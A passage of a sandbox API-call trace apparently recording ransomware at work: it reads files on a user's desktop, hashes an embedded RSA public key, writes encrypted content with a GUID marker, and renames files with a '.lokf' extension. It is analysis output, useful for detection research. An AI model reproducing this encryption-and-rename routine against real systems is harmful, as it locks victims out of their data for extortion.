[0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.377] GetCurrentThreadId () returned 0x9e0 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c839f8 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.378] GetCurrentThreadId () returned 0x9e0 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b670 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b688 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b658 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6a0 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b670 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b670 | out: hHeap=0x660000) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6a0 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b658 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b640 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87cf8 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.381] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x8bfb, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x8bfb, lpOverlapped=0x0) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.381] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.381] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.382] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.382] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.382] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.382] CloseHandle (hObject=0x5cc) returned 1 [0059.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0059.383] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\F0_0MMpq eXwaNPyOb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\f0_0mmpq exwanpyob.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\F0_0MMpq eXwaNPyOb.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\f0_0mmpq exwanpyob.png.lokf")) returned 1 [0059.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.383] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fb2d100, ftCreationTime.dwHighDateTime=0x1d4ccfd, ftLastAccessTime.dwLowDateTime=0x13c954a0, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0x13c954a0, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0x11770, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gg9DmOuSzgeAHjPyg_oR.mp3", cAlternateFileName="GG9DMO~1.MP3")) returned 1 [0059.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0059.384] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\gg9DmOuSzgeAHjPyg_oR.mp3") returned=".mp3" [0059.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\gg9DmOuSzgeAHjPyg_oR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\gg9dmouszgeahjpyg_or.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.384] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=71536) returned 1 [0059.385] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.387] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1174a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.387] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.388] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.388] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.388] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.388] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11770, lpOverlapped=0x0) returned 1 [0059.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.388] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.388] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.388] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.389] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.389] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.389] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.389] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.389] GetLastError () returned 0x0 [0059.389] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.389] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.389] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.389] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.389] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11770) returned 0x9c88ae8 [0059.390] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87cf8 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b640 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87d40 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b658 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b688 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6a0 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.390] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b688 | out: hHeap=0x660000) returned 1 [0059.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6a0 | out: hHeap=0x660000) returned 1 [0059.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.390] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.391] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11770, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.391] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.391] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.391] WriteFile (in: hFile=0x5cc, 